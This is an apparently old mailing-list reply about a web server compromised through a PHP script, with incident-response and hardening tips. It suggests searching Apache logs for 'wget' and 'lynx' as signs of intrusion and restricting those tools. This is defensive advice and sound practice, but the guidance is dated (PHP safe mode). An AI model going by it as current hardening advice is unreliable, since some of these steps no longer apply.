Barbara M. wrote: > A friends that have an httpd server based on TSL 2.2 have received this > mail: > Subject: Your_host_have_been_attacked > Your host have been attacked by pv script. Look on netstat -anp for > process listen on 4123 port > It tell me that there is a process listing on port 4123 and another on > 22222. Stopping httpd and killing the process that own the daemons seems > temporarily "solve" the problem. He did that process are owned by httpd. > It is now busy in rebuilding a new box where to migrate data, so request > me to collect info on the "pv script". > Any hints? > You may have a bad php script on your machine. Check your apache logs for traces of injecting bad programs. Specifically grep for the terms "wget", "lynx" etc on the apache logs since there is a chance that intruder may have uploaded a php script. Also check if your php has any vulnerability.
Some points to secure your server 1. Turn on the safe mode option in php.ini (caution some website codes needs to be rewritten if you do this) 2. Create /tmp as a separate partition and mount it with noexec option. Make symbolic links of other tmps (eg: /var/tmp) to this partition. 3. Remove wget, lynx, make etc programs from your server once it is in production. Or atleast chmod them so that only root can use it 4. Put iptables. thank you -- anu bhaskar _______________________________________________ tsl-discuss mailing list [email protected] http://lists.trustix.org/mailman/listinfo/tsl-discuss
